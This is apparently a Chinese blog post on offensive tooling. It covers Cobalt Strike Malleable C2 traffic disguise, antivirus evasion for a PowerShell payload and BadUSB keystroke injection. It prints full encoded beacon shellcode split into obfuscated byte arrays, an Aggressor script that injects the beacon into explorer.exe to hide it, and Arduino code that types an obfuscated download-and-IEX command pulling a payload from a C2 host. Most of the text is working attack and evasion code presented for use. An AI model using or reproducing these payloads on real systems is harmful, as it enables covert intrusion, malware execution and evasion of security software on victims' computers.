【CS】Cobalt Strick的Malleable2 C2配置以及PowerShell免杀

Malleable2 C2配置

首先,我从一开始就踩了个坑,CS不应该是个开箱即用的东西吗,仔细一想,不对,那样的话流量特征不就明明白白了吗,这里需要用到Malleable C2 Profile。

Malleable Command and Control可拓展的命令和控制
M主要用来控制Cobalt Strike Beacon攻击载荷中的网络参数,也就是说我们可以通过这个伪装/混淆我们的流量。在一些复杂场景中可以更好的规避防火墙。
这里有一个Github项目Malleable-C2里面有现成的配置文件,你也可以自己改一个,我选择了之前学长发我的一份伪装成某度的配置文件进行使用。
如果不用这个混淆流量的话,CS造的PowerShell的马即使能免杀,在后续下发指令的时候也会被Windows Defender给杀掉。
在Listener里面我们也要使用https这种加密的流量,更好绕过防火墙

PowerShell免杀

首先,我们对生成的Payload进行一定研究,发现FromBase64String这个函数应该是被拉黑了,只要处理到这个就报毒。所以我们可以吧Base64转换为字节码的形式进行绕过。
示例如下

#Base64
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim5giIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq+Wrk49zc3NxuEupxcWKZDiU7WNz2puMspr4iIyNr3Owsp68iIyPIkMrHIiMjy6Hc3NwMWmZmeSMZiB2igppanzPzKbfJJRlTyoktE2nscMHTAIS+bHHl5m/j94zr470Z7uh4ScS0kioVJEmwllHt5njNKhTkeLayeow+4o2TcENKI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxITDRMYA3RKTUdMVFADbXcDFQ0RGAN0bHQVFxgDd1FKR0ZNVwwVDRMYA3dMVkBLGANuYm9gaXAKLikjAikoLPonSzhbqQDoC5KwV9PMupbmG49FOlnPw2VqyA74Y46b6zCUIZgHz5/a7bH42YCNxRUm5b/XUiSBe1Ch/9Oq9MQqRPZkwCCT88HLQU32K+4oDoRh5ZrUEut7YQFkTuF/kadzF3Wjao01O3MA9AFfJWl+uN5PDAJnRNLW0cPG8yUr8HG7zmK1bVvluiN9CFEKPyTROTyywfn5CPQ0iv1mc0HBNAUmyOGV+z3P4tv3eO7RhmzDlnzzlGtkFgim7UyQ7gqeEQWheiNindOWgXXc9msS6pkjI2MjYpsjMyMjYppjIyMjYpl7h3DG3PZrsHBwa6rEa6rSa6r5YpsjAyMjaqraYpkxtarB3PZroOcDpuNXlUWoJGsi4KbjVvR7e3trJiMjIyNz4Mtc3tzcEhoRDRIVGw0REBoNERcaIxn9S5I=')
#字节码混淆后
[Byte[]]$PRZNAMJgM = [Byte[]](223,107,160,199,211,203,235,35,35,35,98,114,98,115,113,114,117,107,18,241,70,107,168,113,67,107,168,113,59,107,168,113,3,107,168,81,115,107,44,148,105,105,110,18,234,107,18,227,143,31,66,95,33,15,3,98,226,234,46,98,34,226,193,206,113,98,114,107,168,113,3)
[Byte[]]$qXHbRRolRZZT = [Byte[]](168,97,31,107,34,243,69,162,91,59,40,33,86,81,168,163,171,35,35,35,107,166,227,87,68,107,34,243,115,168,107,59,103,168,99,3,106,34,243,192,117,107,220,234,98,168,23,171,107,34,245,110,18,234,107,18,227,143,98,226,234,46,98,34,226,27,195,86,210,111,32)
[Byte[]]$ckKZjMGmMr = [Byte[]](111,7,43,102,26,242,86,251,123,103,168,99,7,106,34,243,69,98,168,47,107,103,168,99,63,106,34,243,98,168,39,171,107,34,243,98,123,98,123,125,122,121,98,123,98,122,98,121,107,160,207,3,98,113,220,195,123,98,122,121,107,168,49,202,108,220,220,220,126,73,35)
[Byte[]]$vvTYnbPAP = [Byte[]](106,157,84,74,77,74,77,70,87,35,98,117,106,170,197,111,170,210,98,153,111,84,5,36,220,246,107,18,234,107,18,241,110,18,227,110,18,234,98,115,98,115,98,153,25,117,90,132,220,246,202,176,35,35,35,121,107,170,226,98,155,152,34,35,35,110,18,234,98,114,98)
[Byte[]]$oDOZGtzgSPfbKla = [Byte[]](114,73,32,98,114,98,153,116,170,188,229,220,246,200,90,120,107,170,226,107,18,241,106,170,251,110,18,234,113,75,35,17,227,167,113,113,98,153,200,118,13,24,220,246,107,170,229,107,160,224,115,73,41,124,107,170,210,153,60,35,35,35,73,35,75,163,16,35,35,106,170)
[Byte[]]$gufwnOAtfMhSa = [Byte[]](195,98,154,39,35,35,35,98,153,86,101,189,165,220,246,107,170,210,107,170,249,106,228,227,220,220,220,220,110,18,234,113,113,98,153,14,37,59,88,220,246,166,227,44,166,190,34,35,35,107,220,236,44,167,175,34,35,35,200,144,202,199,34,35,35,203,161,220,220,220,12)
[Byte[]]$VijLlpTL = [Byte[]](90,102,102,121,35,25,136,29,162,130,154,90,159,51,243,41,183,201,37,25,83,202,137,45,19,105,236,112,193,211,0,132,190,108,113,229,230,111,227,247,140,235,227,189,25,238,232,120,73,196,180,146,42,21,36,73,176,150,81,237,230,120,205,42,20,228,120,182,178,122,140)
[Byte[]]$qmNNXvweeMJMH = [Byte[]](62,226,141,147,112,67,74,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,18,19,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,17,24)
[Byte[]]$uJyFfILlJHJfVoEZhHkrFaMHrh = [Byte[]](3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,21,13,19,24,3,119,76,86,64,75,24,3,110,98,111,96,105,112,10,46,41,35,2,41,40,44,250,39,75,56,91,169,0,232,11,146,176,87,211,204,186,150,230,27,143,69,58,89,207,195,101,106,200,14,248)
[Byte[]]$CyVhsFXsPf = [Byte[]](99,142,155,235,48,148,33,152,7,207,159,218,237,177,248,217,128,141,197,21,38,229,191,215,82,36,129,123,80,161,255,211,170,244,196,42,68,246,100,192,32,147,243,193,203,65,77,246,43,238,40,14,132,97,229,154,212,18,235,123,97,1,100,78,225,127,145,167,115,23,117)
[Byte[]]$glxAhgUznZWUI = [Byte[]](163,106,141,53,59,115,0,244,1,95,37,105,126,184,222,79,12,2,103,68,210,214,209,195,198,243,37,43,240,113,187,206,98,181,109,91,229,186,35,125,8,81,10,63,36,209,57,60,178,193,249,249,8,244,52,138,253,102,115,65,193,52,5,38,200,225,149,251,61,207,226)
[Byte[]]$HTAAzLNjfk = [Byte[]](219,247,120,238,209,134,108,195,150,124,243,148,107,100,22,8,166,237,76,144,238,10,158,17,5,161,122,35,98,157,211,150,129,117,220,246,107,18,234,153,35,35,99,35,98,155,35,51,35,35,98,154,99,35,35,35,98,153,123,135,112,198,220,246,107,176,112,112,107,170,196)
[Byte[]]$HeDjjuDz = [Byte[]](107,170,210,107,170,249,98,155,35,3,35,35,106,170,218,98,153,49,181,170,193,220,246,107,160,231,3,166,227,87,149,69,168,36,107,34,224,166,227,86,244,123,123,123,107,38,35,35,35,35,115,224,203,92,222,220,220,18,26,17,13,18,21,27,13,17,16,26,13,17,23)
[Byte[]]$XOdUFuGpKi = [Byte[]](26,35,25,253,75,146)
[Byte[]]$jbMpyHdkOCXCCucode = $PRZNAMJgM + $qXHbRRolRZZT + $ckKZjMGmMr + $vvTYnbPAP + $oDOZGtzgSPfbKla + $gufwnOAtfMhSa + $VijLlpTL + $qmNNXvweeMJMH + $uJyFfILlJHJfVoEZhHkrFaMHrh + $CyVhsFXsPf + $glxAhgUznZWUI + $HTAAzLNjfk + $HeDjjuDz + $XOdUFuGpKi

这里有Github的自动化脚本MyBypassAV_ps1.py,不仅可以转换字节码,也可以用随机字符串混淆函数和变量。
混淆了之后就可以基本免杀了,为什么说是基本呢,因为还是有概率在和C2通讯的时候被杀毒Kill掉(可能流量特征还没清干净吧),所以呢我们要尽早转移进程(也怕被看到一个黑框框在这被关掉了)
所以我在C2配置中将session的sleep时间改成了200ms
在通讯的第一次就设置插件自动转移进程,只要在Client中加载AutoSpawn.cna这个文件即可
他可以在第一次通讯200ms之内将进程迁移至explorer.exe并且将新旧session的sleep时间改成5s避免被发现。

#AutoSpawn.cna
on beacon_initial
{
    sub callback
    {
        $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
        $listener = "https";
        if ($2 ismatch $regex)
        {
            $pid = matched()[1];
            $inject_pid = $pid;
            if (-is64 $1)
            {
                $arch = "x64";
            }
            else
            {
                $arch = "x86";
            }
            binject($1, $pid, $listener, $arch);
            bsleep($1, 5, 37);
        }
    }
    if($inject_pid != beacon_info($1,"pid"))
    {
        bps($1, &callback);
    }
    else{
        bsleep($1, 5, 37);
    }
}

效果如图

即实现免杀+自动迁移功能了,badusb终于可以用了。

【近源】Badusb的使用

之前在某公众号看到一篇关于Badusb做近源渗透的文章,之前看过很多的这类设计。本质上Badusb就是用一个单片机模拟出一个键盘,通过键盘键入恶意指令,可以绕过防火墙和不少杀毒软件。
由于自己设计太麻烦了,芯片虽然是有现成的,但是还要买装芯片的壳之类的,太麻烦了。反正只是研究的作用,就某宝上买了一个现成的。
我买的芯片是Leonardo USB ATMEGA32U4,金属外壳的比较好看捏,这个主控主要的问题是Flash太小了,刷的东西多一点都装不下(不过好像也就写个shell进去麻,不用写太多东西)
程序在Arduino中编写

这里参考了某公众号上的Payload,用alias别名和^拼接绕过,在代码上还做了一点修改。
步骤变成了

Win+M(最小化)->Win+R(运行)->按下CapsLock锁定大小写->输入CMD->输入PAYLOAD

最小化可以避免把payload输进其他应用,大小写锁定主要为了避免中文输入法干扰

void setup() {
  Keyboard.begin();
  delay(4500);
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.press('m');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('m');
  delay(200); 
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.press('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println(F("cmd"));
  delay(1000); 
  Keyboard.println(F("cmd /c echo set-alias -name xz -value IEX;x^z (New-Object \"NeT.WeBClienT\").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://192.16'+'8.239'+'.249'+'/1') | p^o^w^e^r^s^h^e^l^l -"));
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}
void loop()
{
}

关于url为什么是http://192.168.239.249/1,要/1用数字不是其他字母呢。
由于CapsLock按键可能原本就是按下的状态,你再按下一次就关掉了,但是如果没有输入法的影响还是可以正常输入的,而url的目录是大小写敏感的,我们则使用数字来确保目录是可以访问到的。
这里的powershell的payload是从服务器上下载的CS负载,下载后在内存中运行也可以免杀的效果。
但是这样还不够,这样可以绕过火绒和360,但是连Windows Defender都过不了,不懂。
Cobalt Strick的PowerShell免杀
运行效果如图


由于Windows Defender好像还会监控流量(不过尽早迁移就可以了),并且这么大一个黑框和命令能让人不害怕吗,很快就会被人关掉,所以我用了插件使得他会自动迁移,更具体的会写在Cobalt Strick的PowerShell免杀
至此Badusb完成了他近源渗透中光荣的一声被当成坏掉的u盘丢进垃圾桶了。
badusb使用倒不困难,困难的还是如何做好PowerShell的免杀。